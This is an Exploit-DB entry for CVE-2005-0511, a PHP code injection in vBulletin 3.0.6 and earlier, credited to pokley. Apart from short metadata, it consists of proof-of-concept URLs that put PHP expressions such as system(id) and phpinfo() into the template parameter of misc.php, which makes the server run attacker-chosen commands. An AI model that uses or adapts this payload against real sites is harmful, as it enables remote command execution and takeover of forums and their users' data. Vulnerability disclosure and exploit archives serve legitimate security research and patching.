vBulletin <= 3.0.6 php Code Injection

2005-02-22T00:00:00
ID EDB-ID:832
Type exploitdb
Reporter pokley
Modified 2005-02-22T00:00:00

Description

vBulletin <= 3.0.6 php Code Injection. CVE-2005-0511. Webapps exploit for php platform

                                        
                                            # Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

# milw0rm.com [2005-02-22]